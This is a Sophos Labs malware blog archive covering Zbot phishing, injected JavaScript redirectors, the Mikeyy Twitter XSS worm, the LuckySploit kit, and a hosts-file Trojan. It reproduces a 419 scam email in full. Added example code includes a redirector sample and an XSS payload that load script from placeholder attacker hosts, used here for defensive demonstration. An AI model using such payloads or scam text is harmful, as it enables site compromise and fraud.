Sophos

Archive for the ‘Uncategorized’ Category

From Server/Outlook update to FDIC to facebook phish: now with a twist

In the past few weeks the authors behind Zbot have been busy. Around October 12 we saw server-upgrade spam carrying links to malware. On the 14th the same campaign reappeared with the malware attached to similar-looking server-upgrade notices. By October 22 the spam messages were touting Outlook updates instead.

For a few days during the past week the group turned its attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, a notice of bank failure would certainly draw a lot of attention and some irrational behavior; the thought of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would bring nothing but grief: the bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to Facebook as their latest platform for spreading malware, but with a twist. The messages are well crafted to look like a real Facebook notification:

The message asks the user to update their Facebook account. The twist is that the linked site does not offer an executable for download straight away. Instead, the visitor is shown a fake Facebook login page:

Victims who enter their Facebook credentials have their account details phished, most likely so the account can be used to spread more malware. Since this is not a real Facebook page, any login details at all, valid or not, lead to this next page:

It is on this page that the malware authors provide an executable for download. This file, updatetool.exe, is a Zbot executable that is proactively detected as Mal/EncPk-LE.

Given the creative social engineering the Zbot authors have been using, users should be very careful when reading messages, whether in email or from a social network. Not clicking links directly, typing the site’s address in manually, and not running downloaded executables go a long way towards protecting one’s computer.


Viral Video Now Just Viral

…well actually it’s a trojan, but it’s still malicious!

Anyone who had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link), which spread across the internet like wildfire a couple of years ago, should know that people trying to sign up to view the video on the official site now get more than they bargained for.

In fact, over the last few days we have seen hundreds of compromised domains across the internet. Obfuscated JavaScript is being injected into these sites’ pages; it attempts to redirect the visitor to another domain hosting a malicious payload.

There is nothing overly complicated about the obfuscation technique: certain characters are escaped, and a junk symbol is inserted at random intervals in the text. Once the junk is stripped and the text unescaped, the recovered code writes another script tag pointing to the domain where the payload is hosted.
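The following is an added example, not code from the original post or from the injected script itself: a static deobfuscator for the kind of redirector described above. It reverses the two steps (strip the junk symbol, unescape) without executing anything, then pulls the src of the written script tag out of the recovered code. The junk symbol (‘$’), the generator used to place it, and the payload URL are all constructed for the example.

```javascript
// Added example, not from the original post: static deobfuscation of an
// injected redirector of the form described above. The real code is
// percent-escaped and a junk symbol is sprinkled in at random positions;
// cleaned up, it document.write()s a <script src=...> tag.

const JUNK = '$';   // assumed junk symbol; in the wild, read it off the sample

// Builds an obfuscated sample the way the injected code looks, so the example
// runs offline. escape() never emits a literal '$' (it becomes %24), which is
// what lets the deobfuscator strip the junk symbol without ambiguity.
function obfuscate(plain, junk = JUNK, seed = 7) {
  let x = seed;
  let out = '';
  for (const ch of escape(plain)) {
    x = (x * 16807) % 2147483647;          // Park-Miller LCG: reproducible "random" gaps
    out += ch;
    if (x % 5 === 0) out += junk;
  }
  return out;
}

// Static recovery: strip the junk symbol and reverse the escaping. Nothing is
// executed, which is how a sample pulled from a live site should be handled.
function deobfuscate(obfuscated, junk = JUNK) {
  return unescape(obfuscated.split(junk).join(''));
}

// Pull every src= out of <script> tags in the recovered code; on a real
// sample this is the host to block.
function extractScriptSrcs(code) {
  const srcs = [];
  const re = /<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(code)) !== null) srcs.push(m[1]);
  return srcs;
}

function recoverPayloadUrls(obfuscated, junk = JUNK) {
  return extractScriptSrcs(deobfuscate(obfuscated, junk));
}

// Constructed sample; the domain is a placeholder, not an observed one.
const SAMPLE_PLAIN =
  'document.write(\'<script src="http://payload.example.invalid/in.js"></script>\');';
const SAMPLE_OBFUSCATED = obfuscate(SAMPLE_PLAIN);
```

Because the escaping step never produces the junk symbol, stripping it first is lossless; reversing the order (unescape, then strip) would corrupt any `%xx` sequence the junk had been inserted into.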

At the time of writing the payload is no longer on the site, but we suspect it will reappear sometime in the near future.

Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A, but that file is no longer available.

Instead, users are greeted with a simple message saying “/ No news…”. Customers will be happy to know that the original JavaScript redirector is detected as Troj/JSRedir-R.


Twitter XSS Strikes Again

It seems to be a bad week for Twitter: once again it has been targeted by an XSS attack, one which is spreading quickly across the site. It is still not certain who wrote it, though “Mikeyy” is referenced in a number of the messages popping up on users’ pages. Earlier in the week it was determined that a 17-year-old named Mikeyy Mooney was responsible for the original XSS attack, and one reason he wrote the exploit was to advertise his website. The new attack chooses one of the following messages and posts it to an infected user’s page.

Twitter, this sucks! Fix your coding.
Twitter Security Team Really? You need to be fired.
Horrible Coding!
@oprah - sup? welcome to twitter. - mikeyy
@aplusk - hey, homo. - mikeyy
@souljaboytellem - your music sucks dude. - mikeyy
@TheEllenShow - hey baby, love me long time? - mikeyy
@StephenColbert - you funny. - mikeyy
@cnnbrk - he's back. ;) - mikeyy
@nytimes - yep, it's true. - mikeyy
Twitter, do you know about the before_save model callback? - mikeyy
This exploit only affects Internet Explorer users. Thanks. - mikeyy
Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy
Get Firefox, thanks. www.Firefox.com
Twitter, you should be paying me now. - mikeyy

The code itself is stored in a file called xss.js on the same server as the previous attacks, so it is not exactly trying to be subtle. It is slightly obfuscated, though simple enough for us in the Labs to reverse.

At first glance the deobfuscated code appears to create some ActiveXObjects, which tells us Internet Explorer users will be affected, as one of the random comments suggests. Any vulnerable user who views an infected profile also becomes infected, because the script is injected through the profile’s CSS; that stored injection is how it has managed to spread so quickly.
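As an added illustration of the class of bug (this is example code, not Twitter’s code and not the worm’s), here is a profile renderer that interpolates a user-controlled styling field straight into the page, beside a hardened version. The fix is the one the worm’s own messages taunt Twitter about: escape HTML characters on output for text fields, and for a CSS value validate it against the only shape it can legitimately have. The field names, the sample payload and the attacker host are assumptions.

```javascript
// Added example, not Twitter's code: stored XSS through a profile styling
// field, vulnerable and hardened. Names and the payload are constructed.

// Constructed payload: closes the <style> block the value lands in, opens a
// <script> pointing at the attacker's host, then reopens <style> so the page
// still parses. The host is a placeholder.
const SAMPLE_PAYLOAD =
  '#000000"></style><script src="http://attacker.example.invalid/xss.js"></script><style type="text/css">';

// Vulnerable: raw interpolation. Every visitor to this profile runs the script.
function renderProfileVulnerable(profile) {
  return `<style type="text/css">body { background: ${profile.bgColor}; }</style>` +
         `<h1>${profile.name}</h1>`;
}

// Hardened, step 1: HTML-escape on output for text contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened, step 2: a CSS context is not an HTML context. Escaping alone still
// lets arbitrary CSS through, so allow only a hex colour and fall back otherwise.
const HEX_COLOR = /^#[0-9a-fA-F]{6}$/;
function sanitizeColor(value, fallback = '#ffffff') {
  return HEX_COLOR.test(value) ? value : fallback;
}

function renderProfileHardened(profile) {
  const color = sanitizeColor(profile.bgColor);
  return `<style type="text/css">body { background: ${color}; }</style>` +
         `<h1>${escapeHtml(profile.name)}</h1>`;
}

// Quick check on rendered output: an unexpected <script> tag means the
// stored field reached the page unencoded.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The validation step matters as much as the escaping: a value that is going to sit inside a `<style>` block or a `style=""` attribute needs a whitelist of what it may contain, because HTML escaping does nothing to stop CSS-level tricks once the value is already in a CSS context.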

Sophos users will be happy to know that we currently detect the script as JS/Twitter-C. We will be keeping an eye on Twitter and reporting anything new we find here on our blog. It is still a good idea to run Firefox with NoScript to help protect yourself from all kinds of JavaScript attacks.


Not so lucky(sploit) mass defacements

Over the past few months SophosLabs have been seeing a relatively new kit being used by attackers in drive-by downloads to infect victims with malware. The kit is known as LuckySploit, and in this blog I will take a brief look at it and what it currently is being used for.

It is a kit that enables attackers to construct malicious sites in order to hit victims with exploits and infect them with malware. Like many previous kits (Mpack, Firepack, Icepack, El Fiesta and the like), the pages it creates contain heavily obfuscated JavaScript in an attempt to evade detection and blocking. However, unlike previous kits, LuckySploit (or at least the recent version of it) also uses encryption.

Over the past few months numerous legitimate sites have been compromised with iframes whose purpose has been to load malicious content from various domains - mainly .cn - being controlled by criminals (also discussed by Danchev). Such compromised pages are being detected as Mal/Iframe-F.

In addition to compromised legitimate sites, I have also seen various “lure” sites that have been posted to trap victims (using celebrities, current news stories and the like to catch user traffic).

Throughout January and February, these sites were redirecting to exploit scripts (perhaps an earlier version of LuckySploit?) detected as Mal/ObfJS-BP, which were serving up mildly polymorphic PDFs carrying exploits (detected as Troj/PdfJS-Y).

More recently, we are seeing these sites redirecting to what appears to be the latest flavour of LuckySploit. The landing page consists of a heavily obfuscated script that is quickly recognizable. This page is blocked as Mal/ObfJS-BB (and historically as Mal/Baals also).

This script generates a passphrase and encrypts it before sending it back to the server in a second request. The content the server then returns is encrypted under that passphrase, so that it cannot be matched on the wire. (Not successfully, though: these pages are detected as Mal/EncJS-A.) Ultimately, if exploitation is successful, the executable payload is sent from the server (seen at the bottom of the figure below).

So what malware is being installed via LuckySploit driven attack sites? Unsurprisingly, financial motivation is driving these attacks. Previously it has been reported that LuckySploit is being used to infect victims with Zbot (the somewhat infamous banking malware also known as ‘Zeus’ that has been mentioned previously). Our findings certainly support this. But it is being used for more than just Zbot. The list below includes all the malware I have seen installed via LuckySploit attack sites over just the past few days:

Several of these items use stealth techniques once installed, making subsequent detection and cleanup trickier.

In summary, LuckySploit is just another kit enabling the bad guys to construct attacks with relative ease. And with the financial sting in the tail that these attacks typically hit you with, ensuring you deploy effective web security is as important as ever.


A bit of weekend rabbit phishing…

Since earlier today we have been seeing an ongoing phishing attack against PayPal, and not the usual phishing email enticing the victim to click through to a rogue site. Instead, the attackers have spammed out malware within a RAR attachment, using the filename rabbits.rar.

A variety of other subject lines and message bodies have been seen as well.

Anyone opening the attached archive will find malware (rabbits.exe) that, once executed, will:

  • write adobe.vbs to the temporary folder
  • run the script, using wscript.exe

The malicious VBScript is a simple Trojan that overwrites the contents of the HOSTS file in order to redirect PayPal-related domains to a specific IP address.

Any subsequent attempt to access those domains will actually load content from the phishing site, whatever the address bar says.
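As an added check (example code, not part of the original post), here is the kind of hosts-file audit a responder would run after an incident like this: parse the file and flag any entry that pins a watched financial domain, since a legitimate hosts file has no reason to contain one at all. The sample file contents, the watched-domain list and the 10.0.0.1 address are constructed; the real Trojan’s target IP is not given in the post.

```javascript
// Added example, not from the original post: detect HOSTS-file tampering of the
// kind this Trojan performs. Sample data and the watched list are constructed.

// Domains that should never appear in a hosts file on an end-user machine.
const WATCHED = ['paypal.com', 'paypal.co.uk'];

// Parse hosts-file text into { ip, name } pairs, dropping comments and blanks.
// Handles both CRLF (Windows) and LF line endings.
function parseHosts(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) continue;
    const [ip, ...names] = line.split(/\s+/);
    for (const name of names) entries.push({ ip, name: name.toLowerCase() });
  }
  return entries;
}

// Return every entry whose name is a watched domain or a subdomain of one.
function findHostsTampering(text, watched = WATCHED) {
  return parseHosts(text).filter(({ name }) =>
    watched.some((w) => name === w || name.endsWith('.' + w)));
}

// Constructed sample of a tampered Windows hosts file.
const SAMPLE_HOSTS = [
  '# constructed sample, not a real capture',
  '127.0.0.1       localhost',
  '::1             localhost',
  '10.0.0.1 www.paypal.com paypal.com   # written by the Trojan',
  '10.0.0.1 www.paypal.co.uk',
].join('\r\n');
```

On Windows the file lives at `%SystemRoot%\System32\drivers\etc\hosts`; the same parser applies to `/etc/hosts` on other systems. Flagging the domain rather than the destination address is deliberate: even a loopback mapping for a bank’s domain is a denial-of-service that no legitimate configuration needs.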

Detection for this malware (both the spammed executable and the VBScript) was included in the alert earlier today as Troj/Agent-IYU.

To my mind, the social engineering behind this one seems rather obscure. Then again, perhaps there are more rabbit fanciers out there than I imagine…


View from the corner office

Welcome to the SophosLabs blog. The aim is to provide regular updates on malware, spam and web-based threats as they happen, and to give the reader an insight into what is happening in the ‘real world’ behind the headlines.

Every day, in every lab, we see interesting, criminal, silly and sometimes bizarre attempts by the ‘bad guys’ to find ways of achieving their goal.

Hopefully this blog will inform, interest and occasionally entertain you.

Each week I will try to provide a summary of the week and highlight trends, to give the reader a better understanding of what is really happening behind the closed doors of SophosLabs.

(by the way, I don’t have an office in the corner, in fact I don’t have an office)


More Zlob activity

Many of the Zlob variants we see today attempt to trick the user into installing them by masquerading as one or more video or audio codecs. Unsuspecting users install these in an attempt to get a video or song to play properly.

Most of the time the Zlob authors simply package their malicious code in a fake codec installer that, to many people, would seem quite legitimate. This hasn’t always been effective, since our virus engine is quite capable of detecting the malicious code even when it is packaged inside the installer. However, the Zlob authors are now employing a new technique to make their malware more adaptable and harder to detect: they are taking advantage of advanced functionality offered by modern setup packages such as NSIS, Wise and InstallShield, namely the ability to fetch updated setup files directly off the internet.

These packages let the malware authors create an innocuous setup wizard for a dummy program, which then automatically downloads the malware from a specified website. Essentially, the malware authors are using the setup wizards to download their malware for them!

Fortunately we can attack this on two fronts: we can detect the fake installers with our virus engine, and block the download site with our WS1000 (and with anti-spam products if necessary).

This renders this attack almost useless!


Malware for fun and profit…

Many of us are now aware of the subtle shift in the nature of emerging threats: where once many viruses and Trojans were written for fun (or to prove a point), evidence strongly suggests that malware is increasingly being used as a means of making a profit. I have a good example of this today, Troj/Clickr-EK.

This Trojan, among other things, contains functionality to load a very specific website in an Internet Explorer window, enumerate a specific set of links and ‘click’ each one as if a user had navigated to the page and clicked the links themselves. Interestingly, the numerous links all led to a Dutch website billed as “the crime game of the internet”, each with a different referrer ID.

The website claims to be a game in which “clicks” are used as a kind of virtual money. It seems that one of the members wrote this Trojan for the sole purpose of cheating!

That’s not much of a profit, you might say. However, the website also seems to reward members with competitions, giving away gifts and prizes such as computer hardware and games consoles to those who come out on top. Perhaps cheating in this way gave the author (and his friends) enough of an edge to make winning these prizes a certainty, in which case the profit is very real indeed…


Mother’s Day

One of the problems with having global operations for malware and spam analysis within SophosLabs is that “holidays” like Mother’s Day fall on different dates depending on which country you live in. So rather than running out and buying my mom flowers when I see Mother’s Day spam, I have to remember that in the UK Mother’s Day was earlier in the year.

Mother’s Day spam

Spammers do target the largest market, which in this case is the USA; however, according to online sources there are 23 possible dates worldwide for Mother’s Day. So maybe the florist and my mom will be happy.


Spam: Another 419

Those 419 scammers never give up! Below is a copy of their latest spam campaign.

But it’s OK, because this time it’s from the crime prevention folks at the United Nations, which should make you feel much more secure. Apparently, if you send them some personally identifiable information and, no doubt, an endless stream of wire transfers, you’ll receive two ‘Security Proof Boxes’ full of cash! If you believe them, I have a lovely bridge you might be interested in.

Remember the Sophos motto regarding spam: Don’t try, Don’t buy, Don’t reply!

Neil, SophosLabs AU

Attn: Beneficiary,

I am delighted to inform you that the UNITED NATION CRIME PREVENTION UNIT Management through the Office of the UNION BANK CHAIRMAN and other bank directors have decided to call back all approved fund Payment through offshore payment centers to the bank treasury following Interception of the UNITED NATION CRIME PREVENTION UNIT AND WORLD BANK and have concluded arrangements to pay you this Funds by cash through the Diplomatic Agents who will bring the cash in a Machine sealed consignment to you in the United States as my bank has temporarily stopped further Payment via wire transfer. In this regards we are going to send your inheritance/ contract payment to you via our accredited Diplomatic Agent/shipping Company and we have secured every needed document to cover the money.

Note: The money is coming on 2 security proof box. The box are sealed with synthetic nylon seal and padded with machine Please you dont have to worry for anything, as the Transaction is 100% risk free. The Boxes are coming with A Diplomatic agent who will accompany the boxes to your house address. All you need to do now is to Reconfirm to us;

Your Full Name
Contact House Address
Occupation
Age
Country
Your mobile phone;

The Diplomatic Attached will travel with it. They will call you immediately they arrive in your country’s airport to your house. I hope you understand me.Note: The diplomat does not know the original contents of the boxes. What l declared to them as the contents is Sensitive Photographic Film Materials for security reasons. I did not declare money to them please. If they call you and ask you the contents please tell them the same thing Ok.

You will secure the ;

1)Diplomatic immunity clearance certificate and the
2)Certificate of fund ownership,
3)lrrevocable Letter of Guarantee

Without this three certificate, your Payment fund will not be approve, can not be courier for this payment season, the needed certificate will Make it pass every custom Checkpoint all over the world without hitch. Confirm the receipt of this message and re-send the requirements to me immediately you receive this message. Please I need urgent reply because the boxes are
Schedule to live as soon as we hear from you. I will try to contact you today again and attached the money as being taken to the diplomat service Company for delivering.

Thanks.

Yours truly,
Mr.NKE ONYE

Head,
UNITED NATIONS CRIME PREVENTION UNIT.